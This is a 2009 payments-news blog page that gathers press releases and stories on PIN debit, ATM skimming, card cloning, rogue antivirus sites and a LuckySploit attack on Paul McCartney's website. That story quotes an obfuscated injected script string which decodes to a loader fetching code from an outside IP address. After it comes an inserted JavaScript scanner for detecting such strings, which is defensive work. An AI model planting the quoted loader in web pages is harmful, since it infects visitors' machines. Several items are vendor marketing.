Wednesday, April 8, 2009

Acculynk Claims Consumers Like Their Solution

Editor's Note:  This came across the news wires today and in fairness, I thought I'd share it with the PIN Payments News Blog readers.  After speaking with HomeATM CEO and Chairman, Ken Mages, he asked me to remind readers what he said a couple weeks back: PIN on PED vs. PIN on the Web

"I'll make this last promise or take a lunch bet with anyone...that once software PIN goes live, within a month, an FTP site will arise with its users' PAN and PIN numbers.  I One-Hundred-Percent (100%) guarantee it."  - kgm - Chairman/CEO - HomeATM ePayment Solutions

Here's Acculynk's Press Release:



Study Finds New Payment Software PaySecure Increases Debit Cardholder Confidence Online

Secure PIN Debit Payment Method Could Increase Online Debit Card Transactions and Lead to Additional Internet Purchases

SAN FRANCISCO--(BUSINESS WIRE)--A new Javelin Strategy & Research (www.javelinstrategy.com) study reveals that a majority of surveyed debit cardholders feel confident about using their personal identification number (PIN) to make online purchases with PaySecure, a new Internet PIN debit payment method provided by Acculynk.

The study, commissioned by Acculynk and PULSE, evaluated debit cardholder perceptions and attitudes about PaySecure, and included 500 U.S. debit card users who purchased online in the last year. Participants used PaySecure for a mock online purchase and then answered a series of questions about their experience using the product.


According to the study, 80% of survey participants would use PaySecure when it is presented by a trusted merchant, 65% of survey participants would feel safer buying on the Internet with PaySecure, and 48% would buy more often on the Internet if they could pay with PaySecure.


“Our research shows that consumers are more willing to complete an online purchase when they feel the transaction is secure,” said James Van Dyke, Founder and President of Javelin.

“In the current economic climate, debit payment methods that increase consumers’ perceived security will be preferred by more consumers.”


Key Findings From the Custom Survey:


Methodology

The study was commissioned by PaySecure provider Acculynk and PULSE and conducted by Javelin Strategy & Research. The study, conducted in March, 2009, recruited 500 U.S. adults to participate. Participants were targeted to obtain U.S. nationally representative groups based on age, gender and annual household income. To qualify for the study, participants were required to use their debit card for at least 40% of point of sale purchases and Internet purchases, and made a purchase on the Internet in the last twelve months. Participants used the PaySecure PIN-pad for a mock online purchase and then completed a survey of agree/disagree questions to question the product’s ease of use, consumer acceptance and perceived security. Agreement for an item was determined as 7 or greater on a 10 point scale.

About Javelin Strategy & Research

Javelin is the leading independent provider of quantitative and qualitative research focused exclusively on financial services topics. Based on the most rigorous statistical methodologies, Javelin conducts in-depth primary research studies to pinpoint dynamic risks and opportunities. Javelin helps its clients achieve their initiatives through three service offerings, including syndicated research subscriptions, custom research projects and strategic consulting. Javelin’s client list includes some of the largest banks, credit unions, card issuers, and technology enterprises in the financial services industry. For more information about this or other Javelin reports, please visit www.javelinstrategy.com/research or call (925) 225-9100.

About Acculynk

Acculynk is a leading technology provider with a suite of software-only services that secure online transactions. Backed by a powerful encryption and authentication framework protected by a family of issued and pending patents, Acculynk’s services provide greater security, reliability, convenience and return on investment for consumers, merchants, networks, issuers and acquirers. For more information, visit www.acculynk.com.

About PULSE

PULSE is one of the nation’s leading ATM/debit networks, currently serving more than 4,500 banks, credit unions and savings institutions across the country. PULSE is owned by Discover Financial Services (NYSE: DFS). The network links cardholders with more than 289,000 ATMs, as well as POS terminals at retail locations nationwide. The company is also a valued resource for industry research related to electronic payments and is committed to providing its participants with education on evolving products, services and trends in the payments industry. For more information, visit www.pulsenetwork.com.
Contacts

Javelin Strategy & Research
Kathleen McCabe, +1-925-225-9100 ext. 15
Marketing Director
k.mccabe@javelinstrategy.com

Permalink:
http://www.businesswire.com/news/google/20090408005322/en


















82% Concerned About Private Label Prepaid Cards

Private Prepaid Cards Take Lumps From Recession: Survey - 04..2009 - U.S. Banker Article
U.S. Banker | April 2009
By Joseph Rosta

Private-label prepaid cards are losing their luster because of the recession, according to an Aite Group research note based on a survey of 21 card industry executives.

Eighty-two percent of those participating say current economic conditions are having a “somewhat to very adverse” impact on the sale of private-label cards, as expanding retailer bankruptcies stoke consumer fears they could be stuck holding worthless and unredeemable gift and other prepaid cards from defunct chain stores.




ATM Skimming Victims Lose $50K (Video)

wgrz.com | Buffalo, NY | ATM Skimming Victims Lose More Than $50,000

The United States Attorneys Office announced Tuesday it's prosecuting a Romanian man for stealing more than $50,000 through a scam known as ATM skimming.

Assistant U.S. Attorney Aaron Mango said Tiberiu Szebeni, 29, used an electronic faceplate, known as a skimmer, to steal account information from ATM customers. Typically, the device sits on top of the slot in which bank cards are inserted.

"When you put your card into the ATM, it passes through this skimming device, and the skimming device then records all of the information on your card," Mango explained.

Once the thieves have that information, all they need is your pin number. Mango said that's typically obtained through the use of a tiny, pinhole camera with a view of the keypad, but he said thieves may also utilize a high-powered, zoom camera stationed somewhere in the distance.

Mango said once Szebeni obtained both the account and pin numbers, he transferred that information to empty store gift cards. Then, by using the magnetic strip in each card, Mango said Szebeni essentially turned each one into a clone of the original ATM card.

Federal prosecutors have charged Szebeni with use of a fraudulent access device with intent to defraud. Secret Service agents arrested him at the Rainbow Bridge on March 31st after a tip from a Rochester resident led them to the Romanian citizen.










Paul McCartney Website LuckySploited



Source: scmagazineus
Complete item: http://www.scmagazineus.com/Paul-McCartneys-website-hacked-to-distribute-malware/article/130330/

Description:
The official website for former Beatle Paul McCartney was compromised to infect users through drive-by downloads.

The site was attacked by the LuckySploit toolkit, according to web security firm ScanSafe, which discovered the hack. The toolkit was recently updated to include a set of HTML files that contain obfuscated and malicious JavaScript code, according to NoVirusThanks.org, a computer security website.

ScanSafe said in a statement that its researchers discovered the infection on Saturday, the same day McCartney reunited on stage with Ringo Starr for the first time in years. The toolkit was hidden behind an invisible frame on the site. When users visited, their machines were hit with an exploit that downloaded a rootkit.

Once the rootkit is installed "behind the scenes" on the victim's computer, thieves could steal personal information, such as credit card details and login credentials, according to ScanSafe.

"Once your computer is infected with a rootkit, none of your personal information is safe," said Spencer Parker, director of product management for ScanSafe, in a statement. "This is an extremely attractive target for cybercriminals given the level of attention McCartney is receiving at this moment."

McCartney's site quickly was fixed, according to ScanSafe. It is unclear how many users were compromised. A representative for the musician could not be reached for comment on Tuesday.


Related:

The website of famed singer Paul McCartney is the latest victim in a string of website compromises involving the Luckysploit exploit toolkit. The compromises are related to an outbreak of bank-related data theft trojans during the first quarter of 2009. These outbreaks track back to the Zeus botnet which was implicated in a $6 million commercial account heist on 20 European banks in the summer of 2008.

As far as exploit toolkits go, Luckysploit is a bit unusual inasmuch as it uses an asymmetric key algorithm (standard RSA public/private key cryptography) to encrypt the communication session with the browser.

Zeus bots are known for browser traffic sniffing, intercepting POST data and keystrokes associated with the active browser session as well as clipboard data pasted into the browser. While these actions facilitate Zeus' activities concerning banking theft, it could also lead to compromise of FTP credentials. For this reason, impacted sites may not just be spreading new Zeus banking trojans and bots, their management systems may also be infected with previous variants of Zeus bots and banking trojans.

Embedded scripts on impacted pages may appear as follows:

 var source ="=tdsjqu!uzqf>#ufyu0kbwbtdsjqu#!tsd>#iuuq;0095/355/249/660hpphmf.bobmzujdt0hb/kt#?=0tdsjqu?"; var result = "";for(var i=0;i


Compromises have also been observed on flat HTML-only sites, furthering the likelihood that compromised FTP credentials may be the cause. As with most malware today, symptoms of a Zeus infection include the disabling of firewall or other security software. Zeus bots and trojans are also rootkit-enabled, which may hamper discovery efforts.


Source: E-Secure-IT
https://www.e-secure-it.com
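
The embedded script quoted above hides a script tag by shifting every character by a fixed amount, which a site owner can check for mechanically. The following is an added example, not code from the original post or from E-Secure-IT: it scans page source for string literals that decode, under a small character shift, to a script or iframe tag with a src attribute. The function names, the shift range and the surrounding sample pages are assumptions constructed for illustration; only the encoded literal is taken from the post.

```javascript
// Added example: detect string literals that hide an HTML tag behind a fixed
// character shift, the encoding used by the injected script quoted above.
// All names here (scanPage, shiftString, ...) are hypothetical.

// Tags an injected loader typically writes into the page once decoded.
const TAG_RE = /<(script|iframe)\b[^>]*\bsrc\s*=\s*["']?([^"'\s>]+)/i;

// Pull the contents of single- or double-quoted literals out of page source.
// This is a heuristic line-based match, not a full HTML/JavaScript parser.
function stringLiterals(source) {
  const out = [];
  const re = /"((?:[^"\\\n]|\\.)*)"|'((?:[^'\\\n]|\\.)*)'/g;
  let m;
  while ((m = re.exec(source)) !== null) {
    out.push(m[1] !== undefined ? m[1] : m[2]);
  }
  return out;
}

// Add `delta` to every character code of `s`.
function shiftString(s, delta) {
  let out = "";
  for (let i = 0; i < s.length; i++) {
    out += String.fromCharCode(s.charCodeAt(i) + delta);
  }
  return out;
}

// Try each non-zero shift in [-maxShift, maxShift] on every long literal and
// report the ones that decode to a tag loading an external resource.
// Shift 0 is skipped on purpose: a readable tag is not the encoding in question.
function scanPage(source, maxShift = 5, minLength = 16) {
  const findings = [];
  for (const literal of stringLiterals(source)) {
    if (literal.length < minLength) continue;
    for (let delta = -maxShift; delta <= maxShift; delta++) {
      if (delta === 0) continue;
      const decoded = shiftString(literal, delta);
      const m = TAG_RE.exec(decoded);
      if (m) {
        findings.push({
          shift: delta,              // shift that had to be applied to decode
          tag: m[1].toLowerCase(),   // "script" or "iframe"
          src: m[2],                 // resource the hidden tag would load
          decoded,
        });
        break;
      }
    }
  }
  return findings;
}

// Constructed sample page carrying the encoded literal quoted in the post.
const INFECTED_PAGE = [
  '<html><body><h1>Tour dates</h1>',
  '<script>var source ="=tdsjqu!uzqf>#ufyu0kbwbtdsjqu#!tsd>#iuuq;0095/355/249/660hpphmf.bobmzujdt0hb/kt#?=0tdsjqu?"; var result = "";</script>',
  '</body></html>',
].join("\n");

// Constructed sample page with only ordinary markup and text.
const CLEAN_PAGE = [
  '<html><body><script src="/js/site.js"></script>',
  '<script>var greeting = "Thank you for visiting, please sign the guest book!";</script>',
  '</body></html>',
].join("\n");

for (const f of scanPage(INFECTED_PAGE)) {
  console.log(`shift ${f.shift}: hidden <${f.tag}> loading ${f.src}`);
}
console.log(`clean page findings: ${scanPage(CLEAN_PAGE).length}`);
```

Running the same scan over files pulled from the web root after an FTP upload gives a quick check for this family of injected literals on flat HTML sites as well.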






HomeATM Press Release

With PCI PED 2.0 Certification in Hand, HomeATM Targets Funds Transfers

HomeATM Announces Strategic Partnership to Deploy 250,000 Terminals with Major Remittance Provider

FOR IMMEDIATE RELEASE


PRLog (Press Release) – Apr 08, 2009 – Chicago: HomeATM ePayment Solutions, a leading provider of secure hardware and software solutions, today announced that it has signed a contract with a major remittance provider to provide 250,000 Safe-T-PIN (TM) terminals to its customers.

The Safe-T-PIN point of sale terminal, manufactured by HomeATM, is the first ever Internet PED to achieve PCI PED 2.0 certification from the Payment Card Industry. Safe-T-PIN provides secure two factor authentication for e-commerce transactions and secure log-in.


When combined with HomeATM's proprietary electronic money transfer platform, the SafeTPIN allows consumers and businesses alike to swipe any bank card, enter their PIN and transfer money in real-time to the recipient.

With the HomeATM Funds Transfer application, it's no longer necessary to go through the hassles of driving or walking to a money transfer location to send or receive money. It can be done in the safety of your own home in real time. HomeATM also eliminates the burden of having to preload third party cards...simply swipe your existing bank card, enter your PIN and send. The recipient swipes their bank card, enters their PIN and receives. Nothing could be more simple.

The pocket-sized Safe-T-PIN(TM) is USB "plug and play," eliminating the need for drivers or downloads. Additionally, it works with any operating system or browser. The device provides users with the added convenience of swiping their cards versus keying in their numbers and will work with any bank, card processor, and currency. The significance of this feat is that bank/military grade encryption (including 3DES and DUKPT key management) of financial data from beginning to end, is now affordable to the masses.

SourceMedia's ATM&Debit News has featured HomeATM on a front page article in their latest issue which you can access at www.HomeATMBlog.com

About HomeATM's Safe-T-PIN (tm)

The HomeATM Safe-T-PIN is the world's only PCI PED 2.0 Certified E-Commerce Device.  Employing Triple DES Encryption and DUKPT Key Management, it provides complete end-to-end encryption protecting the user's card data from beginning to end.

About HomeATM

HomeATM owns a global patent for secure Internet PIN based transactions. Leveraging our E2EE PCI 2.0 PED certified solution, a merchant or remitter can move funds from their bank account or open loop/closed loop payment card in real-time. Utilizing HomeATM's patented solution with a bank issued card alleviates the burden for merchants to address fraud issues as HomeATM leverages the issuing bank's KYC/AML (Know Your Customer/Anti-Money Laundering) protocols. No other payment solution serves Person-to-Person, Business-to-Consumer, Business-to-Business, and Mobile Payments with the speed, security and cost-effectiveness of HomeATM. HomeATM is EMV ready and already enjoys strategic relationships with Cardinal Commerce and UATP.

For further information, visit: www.HomeATMBlog.com or contact Mitchell Cobrin, COO mcobrin@HomeATM.net

# # #






Wolf in Sheep's Clothing - Security Software

Rogue security software now a top threat - Computer Business Review : News
Published:08-April-2009 | By Kevin White

Microsoft charts rise of malware in fake security software

(Editor's Note:  I've provided examples of Rogue Software Sites below)

Security intelligence gathered by Microsoft Corp shows a significant increase in rogue security software or ‘scareware’ that lures people into paying for protection that, unknown to them, is actually malware often designed to steal personal information.

According to the latest Microsoft Security Intelligence Report released today, rogue programmes known as Win32/FakeXPA and Win32/FakeSecSen were detected on more than 1.5 million computers.

Win32/Renos, another threat that is used to deliver rogue security software, was detected on 4.4 million unique computers, an increase of 67% over the first half of 2008.

Vinny Gullotto, general manager of the Microsoft Malware Protection Centre said, "We see cybercriminals increasingly going after vulnerabilities in human nature rather than software."

He said the security industry needs to combat the next generation of online threats through a community-based defence and broad industry cooperation with law enforcement and the public.

Rogue security software and other social engineering attacks compromise people's privacy and are costly; some take personal information and tap into bank accounts, while others infect computers and rob businesses of productivity.

Steps can be made to counter the problem, and the report recommends that security managers always configure computers to use Microsoft Update instead of Windows Update.

They should also use the Microsoft Security Assessment Tool (MSAT) to help assess weaknesses in their IT security environment.

Individuals are warned not to follow advertisements for unknown software that appears to provide protection and should avoid opening attachments or clicking on links to documents in e-mail or instant messages that are received unexpectedly or from an unknown source.

The report also cited the biggest cause of data breaches as lost and stolen computer equipment, which it reckons makes for 50% of all reported incidents.

PIN Payments News is Providing Warnings on the following rogue sites:


TheGreatSecurity.com is a scam website designed to sell rogue anti-spyware programs. Upon entering the website you will be greeted by a fake online system scan, which returns an exaggerated report full of non-existent infections. Afterwards the website will display some popups, which read:

    "The page at http://TheGreatSecurity.com says:   Your computer remains infected by viruses! They can cause data loss and file damages and need to be cured as soon as possible. Return to System Security and download it secure to your PC"

or

    "http://TheGreatSecurity.com says:  Warning!!! Your computer contains various signs of viruses and malware programs presence. Your system requires immediate anti viruses check! System Security will perform a quick and free scanning of your PC for viruses and malicious programs."

TheGreatSecurity.com is a malicious website, and should therefore be blocked using the HOSTS file.

WWWMobileReads.com is a malicious website, created for only one purpose - to sell rogue anti-spyware programs. WWWMobileReads.com provides a fake online system scan, which will attempt to scare the user with fake threats. Afterwards it will display a few popups with the same reason in mind. The popups read:

    "The page at http://WWWMobileReads.com says:      Your computer remains infected by viruses! They can cause data loss and file damages and need to be cured as soon as possible. Return to System Security and download it secure to your PC"

or

    "http://WWWMobileReads com says:      Warning!!! Your computer contains various signs of viruses and malware programs presence. Your system requires immediate anti viruses check! System Security will perform a quick and free scanning of your PC for viruses and malicious programs."

MobileReads.com is a malicious website and should therefore be blocked using the HOSTS file.

JBF





Attack of the Card Skimmers - Gizmodo

Source: Gizmodo
Complete item: http://i.gizmodo.com/5202776/attack-of-the-card-skimmers-its-happening-right-here-right-now

Description:
Previously on C.S.I... a man found an actual card skimmer in the wild, in the flesh. Today, Gizmodo reader Sean became the card skimmer/PIN camera's latest almost-victim. Where? Chase Bank in Manhattan, East Village.

Sean Seibel was inside a local Chase bank where he inserted his ATM card into one of two side-by-side automatic teller machines. When the machine told him it could not read his card, it took him a bit of jiggling to get his card back. He tried it a couple more times and got the same results. Before trying the other machine, he inspected the slot of the current ATM he was using and realized that it had a false plastic cover attached to the slot. The amazing thing about the cover was that the translucent green plastic matched the card reader slot perfectly, meaning that it was made specifically for Chase ATMs. After snapping a few photos with his iPhone, he alerted the branch manager and explained what happened.

As he was leaving, Seibel remembered reading about card skimmers having small cameras in the proximity in order to read PIN pad activity, so naturally, he went back to the ATM to inspect, which is where he found an extra mirror attached to the vandalized machine that the other ATMs didn't have. Drilled into the mirror was a tiny pinhole with a camera inside, directed at the PIN pad. Seibel alerted the branch manager again and asked Chase why they hadn't inspected the ATM after he had warned them the first time. Chase honestly replied that they hadn't thought of it because they had never encountered that sort of thing before.

Tuesday, April 7, 2009

HomeATM in the News

Click the Graphic on the Left
to Read About HomeATM in the latest edition of ATM&Debit News


HomeATM's PCI 2.0 PED Certification Provides the following benefits:

Card Present Rates in a Card Not Present World!

"TRUE" PIN Debit Interchange Rates!

Dual Authentication!

15 Times More Convenient than Typing in 14-16 Card Number Digits, Expiration Dates and CVV Codes!

Effectively Removes Internet Retailers from the Scope of PCI DSS Potentially Saving Them 100's of Thousands of Dollars!  (Same with Financial Institutions, only they could save million$)

End to End Encryption |Triple DES | DUKPT Key Management | Security

Exponentially Advanced Log-In, Authentication Platform for Online Banking!












Home(r)ATM Would Eliminate Cloning Altogether!


In this ISR News post, it is reported that Credit Card Cloners Stole 3.5 million.

In a nutshell, that's 3.5 Million reasons for using HomeATM's SafeTPIN device.   Without the PIN, a cloned card would be useless.  So would DNS hijacking (redirecting you to a cloned website).  No username/password, instead Swipe your Card, Enter your PIN.  They wouldn't receive the data...unlike the username/password, which they would receive.

In fact, cloning wouldn't be an "issue" (pun intended) at all, if online merchants employed the HomeATM True PIN Debit solution. 

Come to think of it neither would the over exorbitant "Card Not Present" rates...oh...and an end-to-end encryption methodology is certainly an added benefit.  Don't let me forget convenience.  If I can swipe my card 14-16 times faster than entering 14-16 digits from my credit or debit card, then I consider it to be 14-16 times more convenient.  You?  And yes, we do credit...and yes...it would be at "card present" credit card rates.  Any questions?

ISR News: Credit Card Cloners Steal £3.5m
April 7, 2009 by ADMIN



Excerpts From Finextra.com

A gang of five fraudsters who ran a global credit card cloning ring out of a London flat stole £3.5 million in just a few days, a court heard yesterday.

Prosecutor Ben Fitzgerald told Southwark crown court that police found fake cards and counterfeiting technology in the London flat.

The accused allegedly went on a spree between 28 September and 8 October last year as Barclaycard migrated cardholders from the Goldfish credit card business it acquired from Discover Financial Services earlier in the year.

Computer software found in the flat was used to make fake cards before the gang stole £3.5 million, with £645,000 spent on the cards in Britain alone, the court heard.

Khi-San Voong, 46, Qiu Yeu, 46, Qiang Xue, 34, and Dauy Chung, 40, all of Walworth, deny conspiracy to defraud. Cai Caixa, 27, pleaded guilty.

The trial continues
...











I Have a Present For You! And a Card!

Card Present vs. Card Not Present

Before you accuse me of luring you to this post with the promise of a "present" and a "card" simply fill out the poll on the right and send me your email and shipping address. You'll get your "card present" enabling SAFETPIN device for free. Take a look at the right sidebar or above for more details.

A recent post by Ed Kountz at the Forrester Blog made me realize that one of the biggest impacts of utilizing a hardware vs. software device is simply this: Interchange.

HomeATM is the only company in the world which can provide e-tailers with a PCI 2.0 PED and thus "card present" TRUE PIN Debit rates. Why do I say true? Because our transactions are conducted in the same manner as a traditional retail location.

In addition, because our device is "ALREADY" PCI 2.0 PED certified, and employs DUKPT key management, we would effectively remove e-tailers from the scope of PCI DSS as no cardholder data is transmitted during the transaction.


Once the consumer has our low cost device, they become a "card present" buyer. They swipe their card, they enter their PIN and therefore the e-merchant benefits from not only dual-authentication, but also benefit from significantly lower interchange fees.

Example:

$200 order at Amazon. Card Not Present Rate: 2% + .25 cents = $4.25
$200 order at Amazon Card Present/ PIN Authenticated: = .75 cents. Savings = $3.50 (In this example an 88% savings!)

Now, add security (PCI 2.0 PED), add convenience (isn't swiping the card 14 to 16 times faster than typing in your 14-16 digit card number?), deduct chargebacks, add familiarity (don't you swipe your card in the store?) and our SafeTPIN is a compelling value proposition.

On the flip side, a software based PIN Debit application would still be a "card not present" transaction. The CNP PIN rate doesn't exist, but the EFT networks could create one. Of course, it will be exorbitantly higher than a Card Present PIN transaction. Remember when transactions were done with the device pictured on the left? Well unlike that device, HomeATM's SAFETPIN is built for the long run...and provides safer, more secure and thus lower rates.

So at the end of the day, our device (which is also EMV ready) is built with both the consumers, banks and merchants in mind. A software application is built with only the EFT Switches in mind. So it's no wonder the EFT switches are backing it. It's like Microsoft paying people to use Live Search with their Cashback program. The EFT switches are getting paid to push a software application. But what will be the public's uptake? And where's the benefit to the merchants? A tiny savings on Interchange...in exchange for a higher risk of liability in the instance of a breach? It's all interesting. I would think that the merchants would want a bigger savings and less risk, which is what HomeATM's PCI 2.0 PED provides. Wouldn't you? We'll see...

Here's the article showing the pent up frustration with Interchange Fees from the NRF, the NGA and NACCS. (The Big 3) They are all bricks and mortar organizations and are still throwing a fit about Interchange Rates. When will the Internet Retailer 500 band together and start demanding that they at least be afforded the opportunity to enjoy the rates the "Big 3" are unhappy with?





Transacting Value: The Impact of Credit Industry Challenges on Card Marketing
Ed Kountz - April 6th 2009

Early on in this blog, I predicted that 2009 would see an increase in the number and stridency of calls for reforms to the U.S. credit card market, particularly in terms of types and amounts of acceptable fees. The Federal Reserve’s December 2008 card industry changes certainly made clear that this was happening. But now, the long-simmering brew appears to be spreading.

Two recent events serve to validate the premise:


--The National Retail Federation (NRF), the National Grocers Association (NGA) NACCS Angle Against Interchange. Recently, the NRF, NGA and NACCS -- together, the big three of retail associations -- recently held what their release billed as a “telephonic press conference” announcing the creation of “unfaircreditcardfees.com,” as well as an associated public interest campaign, to encourage consumers to press legislators for reforms to the “unfair and hidden credit card fees called “interchange””. This approach muddles the issue, in my opinion, as it uses language that ties the interchange dispute to consumers’ raw emotions at the account-fee issue, without identifying the (basic but relevant) differences in those topics. Whatever the ultimate impact, the directness of the appeal is impossible to miss.

--Senate Banking Committee Approves Card Reforms. On March 31, the Senate Banking Committee gave one-vote approval to measures designed to rein in certain credit card industry practices. The bill would include most of the Federal Reserve Rule changes passed in December, such as bans to universal default and double cycle billing, but would add fee restrictions and protections for borrowers under 21. Bill sponsor Chris Dodd said he was going to work over the recess to garner “broad support” for the effort.

As recent delinquency trends suggest, economic conditions continue to impact credit card usage and growth at a macro level. But increased scrutiny of long-held credit card industry practices will add additional pressure to an industry already feeling the strains.

Continue Reading at the Forrester Blog for eBusiness & Channel Strategy Professionals









ID Cards Could Be Fitted with Chip and PIN Technology to Combat Fraud

The Press Association: ID cards 'could use chip and pin'
ID cards could be fitted with chip and pin technology to help combat identity fraud. The head of the Government agency tasked with producing the cards said there were no "technical obstacles" to adding chips to the cards and handing out pin numbers. James Hall, chief executive of the Identity and Passport Service said adding chips might allow the cards to be used in ATM machines in the future.

Officials are also looking at chip and pin as a possible way to help combat online fraud and help protect internet shoppers.

It also emerged the Home Office has issued half as many ID cards for foreign nationals in the first four months than expected.

When the card was launched in late November ministers predicted that between 40,000 and 50,000 non-EU nationals would have cards by the end of last month. But by the end of last week 22,500 cards had been issued. Mr Hall said they had encountered "the odd wrinkle" in the system but overall it had worked "pretty well".

A spokesman for the UK Border Agency (UKBA) said 42,000 foreign nationals had been through the enrollment process and had their biometric details taken. Mr Hall said he was looking at how ID card holders could "assert their identities" online when the card is rolled out.

He said: "One of the reasons for the format of the card is we have the opportunity to put it in to card readers and potentially use it in existing networks such as the ATM network.

One of the issues on the table is whether we should introduce chip and pin technology in to the card. There are no technical reasons why we couldn't do that."

Editor's Note: In fact, HomeATM's SAFETPIN is EMV ready (smart card, chip ready). Which brings up a question. How would a software PIN Debit application work in an EMV environment? If you know, comment below...lol!



SizzleMoney Offers Mobile Banking to Immigrants

I blogged about SizzleMoney about a week ago, but here's an excerpt from a good article in this morning's American Banker...

Prepaid Account Offers Mobile Banking Service to Immigrants

By Will Hernandez
American Banker | Tuesday, April 7, 2009

Denarii Payments Inc. of Atlanta has developed a mobile phone-linked prepaid product called SizzleMoney that is initially targeting Hispanic immigrants.

People can use the product to send one another money by text message, access funds in their SizzleMoney accounts with a prepaid debit card and make purchases at the point of sale with their phones.

"It's basically mobile cash," said Donald Baggett, Denarii's founder and chief executive officer.

Denarii said SizzleMoney will appeal to immigrants, who often use their mobile phones as their primary method of communication.

The SizzleMoney account features debit cards bearing the logos of the Maestro, Pulse, Star and Cirrus debit networks. The cards can be used to make PIN debit purchases and to make withdrawals at automated teller machines. Customers can upgrade to MasterCard Inc.-branded debit cards.

Central National Bank of Enid, Okla., issues the cards and its Interactive Transaction Services subsidiary processes the transactions.

Continue Reading at American Banker


Will Hernandez is the associate editor of ATM&Debit News.



NACHA - 18.2 Billion ACH Payments in 2008

ACH Transaction Volume up by 1.2 Billion Payments - Despite Economic and Industry Pressures
Consumer ACH Bill Payments Made via Internet near $1 Trillion

Orlando Florida: PIN Payments News: The number of ACH payments in 2008 topped 18.2 billion, representing an increase of 1.2 billion over 2007, according to statistics released today by NACHA - The Electronic Payments Association at its PAYMENTS 2009 conference.

"Consumers, businesses, and government are continuing to embrace the safe, smart, and green attributes of ACH payments and choosing electronic over paper," said Janet O. Estep, NACHA president and chief executive officer. "Despite the overall economy slowing in 2008, the ACH Network continues to see positive growth."

The portion of ACH payment volume passing through the ACH Operators grew in 2008 to nearly 15 billion transactions. The number of ACH Network transactions in 2008 was 14,960,689,587, which is 7.1 percent more than 2007. The dollar value of these payments was $29.96 trillion, an increase of 4 percent over 2007.

Internet Payments

Internet-initiated ACH debits (WEB) experienced robust growth in 2008, increasing by 19.7 percent to almost 2.1 billion payments. When combined with consumer-initiated credit payments (CIE), the dollar value of consumer ACH payments made via the Internet is nearing $1 trillion annually ($939 billion in 2008).

Business-to-Business (B2B) Payments/Financial EDI

More than 1 billion EDI-formatted addenda records were transmitted across the ACH Network in 2008, a 14.6 percent increase over 2007. Businesses use EDI-formatted addenda records to send and receive invoice- and other payment-related information. The volume of CTX payments, which can carry up to 9,999 addenda records, increased by 16.1 percent, and the number of CCD payments carrying an addenda record increased by 17.9 percent.

Back Office Conversion (BOC)

In its first full year of availability, the newest e-check transaction - BOC - grew by 1,772 percent in 2008 to a total of 78,460,461 payments. This volume is comparable to the original Point-of-Purchase (POP) check conversion application when accounting for the significant decline in consumer check-writing over the past eight years. At the same time period after its introduction, the annualized volume of POP transactions was 101 million; however, consumer check-writing has been declining during this time period by about 4 percent per year.

Federal Government Payments

The Federal government used the ACH Network for more than 30 million Direct Deposits as part of 2008's economic stimulus package. This contributed to an overall growth of Federal government ACH payments of 10.2 percent, to 1,145,895,074 payments in 2008. According to the Financial Management Service, the Federal government saves $0.925 for every Direct Deposit that replaces a check payment. With over 1 billion Direct Deposits, the Federal government saved at least $925 million in 2008 by using the ACH Network.

Network Risk and Quality Indicators

The most significant ACH Network risk and quality indicators improved moderately in 2008. Overall, the rate at which ACH debits are returned as unauthorized declined slightly from 0.041 percent to 0.040 percent, and there were no SEC codes that had a significant increase in its unauthorized rate.

NACHA -- The Electronic Payments Association

NACHA -- The Electronic Payments Association is a not-for-profit association that oversees the Automated Clearing House (ACH) Network, a safe, efficient, green, and high-quality payment system. More than 15,000 depository financial institutions originated and received 18.2 billion ACH payments in 2008. NACHA is responsible for the administration, development, and enforcement of the NACHA Operating Rules and sound risk management practices for the ACH Network. Through its industry councils and forums, NACHA brings together hundreds of payments system stakeholder organizations to encourage the efficient utilization of the ACH Network and develop new ways to use the Network to benefit its diverse set of participants. NACHA represents nearly 11,000 financial institutions through direct membership and 19 regional payments associations. NACHA and its members provide education, tools, and resources to increase the adoption of ACH payments to benefit businesses, consumers, and governments. To learn more, visit www.nacha.org and www.electronicpayments.org.

SOURCE: NACHA








Online Banking in Ireland Soars

Source: Finextra
Complete item: http://www.finextra.com/fullstory.asp?id=19891

Description:

The popularity of online banking in Ireland has soared over the last year, with 2.2 million customers now registered, a 28% increase on the previous year. According to data gathered from financial institutions by the Irish Banking Federation (IBF) and Irish Payment Services Organisation (Ipso), 2.2 million customers were registered for online banking by the end of 2008, up 27.8% on the 1.8 million recorded at the end of 2007. Ireland has a population of around 4.4 million.

In addition, there was a 31.6% rise in the number of Internet payments to 30.7 million - equivalent to 84,000 per day. A 33.6% increase, to 123 million, was also recorded in the number of times customers accessed their account balances online.

Pat Farrell, CEO, IBF, says: "We can see from the data compiled to date that online banking is on a significant growth path in Ireland. Comparative figures for 2007 show that the average user here made 14% more online payments and 20% more online enquiries than his/her UK counterpart. However, in a leading online adopter like Norway the average customer made around three times more payments online - indicating that there is considerable scope for further growth."

Una Dillon, head, card services and communications, Ipso, adds: "Online banking is facilitating the migration from cheques and other paper-based payment methods to electronic payments. The move to electronic payments is vital in ensuring Ireland's competitiveness and efficiency within the wider European market."


Link2Gov for Professional Crastination



Link2Gov: A Procrastinating Federal Taxpayer’s Best Friend

Federal balance-due tax payments accepted at PAY1040.com, BML.PAY1040.com and businesstaxpayment.com

MILWAUKEE--(BUSINESS WIRE)--Link2Gov Corp., a Metavante (NYSE:MV) company and IRS-authorized payment processor since 2003, today is reminding individuals and businesses of their secure, convenient and reliable electronic payment options for settling-up with Uncle Sam before midnight on April 15 — the federal tax deadline. Taxpayers can beat the clock with an electronic payment initiated at any of Link2Gov’s payment portals: www.PAY1040.com, 1-888-PAY-1040 and www.businesstaxpayment.com. Taxpayers with questions about the payment services can reach Link2Gov customer service agents at 1-866-658-5465.

Federal balance-due tax payments initiated through Link2Gov payment services1 are authorized in real-time, with the IRS-recognized payment date being the same date the transaction is successfully completed. Taxpayers receive a transaction confirmation number as an assurance they have completed the payment process. PAY1040.com and businesstaxpayment.com accept American Express®, Discover®, MasterCard®, and Visa® credit and debit cards, as well as debit transactions from cards participating in the NYCE®, PULSE® and STAR® payments networks. New for Tax Season 2009, Link2Gov also accepts Bill Me Later payments at BML.PAY1040.com.

“The key attributes of our federal tax payment programs — speed, convenience and knowing an IRS bill has been instantly paid — become increasingly vital as the deadline closes in on taxpayers,” said Frank D’Angelo, group president, Metavante Payment Solutions, which includes Link2Gov. “Taxpayers choosing Link2Gov services receive peace of mind, and depending on their issuing bank’s card program, the opportunity to earn rewards as well.”

About Metavante

